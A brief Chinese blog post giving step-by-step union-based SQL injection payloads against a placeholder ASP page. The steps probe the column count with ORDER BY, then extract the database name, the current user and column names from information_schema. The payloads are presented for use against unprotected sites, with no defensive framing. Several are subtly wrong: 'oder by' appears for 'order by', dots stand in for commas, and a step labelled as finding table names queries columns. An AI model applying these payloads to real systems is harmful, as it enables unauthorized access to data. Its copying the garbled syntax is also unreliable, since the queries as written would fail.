SQL注入语法

# 数据库 2024-05-05 14:33 0 29 来源: 云博客

不考虑防护措施的情况下常规注入语句

网站http://www.xxxx.com/xxxx/1.Asp?id=1

猜字段http://www.xxxx.com/xxxx/1.Asp?id=1   oder by X        X=(1.2.3.4.5.6.....)直至网站访问正常为止。

查询数据库http://www.xxxx.com/xxxx/1.Asp?id=1   union select 1.2.3.database().5    查询数据库名

查询数据库http://www.xxxx.com/xxxx/1.Asp?id=1   union select 1.2.3.user().5    查数据库用户

查询表明http://www.xxxx.com/xxxx/1.Asp?id=1   union select 1.2.3.4.column_name from information_schema.columns where table_name = 数据表名hex值

相关文章

Confluence 6 关于嵌入的 H2 数据库
Confluence 6 关于嵌入的 H2 数据库
PHP7操作MongoDB的增删改查和分页操作
PHP7操作MongoDB的增删改查和分页操作
C3PO数据库连接池
C3PO数据库连接池
Mysql C API 字母顺序整理
Mysql C API 字母顺序整理
MySQL数据库篇之索引原理与慢查询优化之二
MySQL数据库篇之索引原理与慢查询优化之二
MySQL-5.6.36-多实例-部署(编译版)
MySQL-5.6.36-多实例-部署(编译版)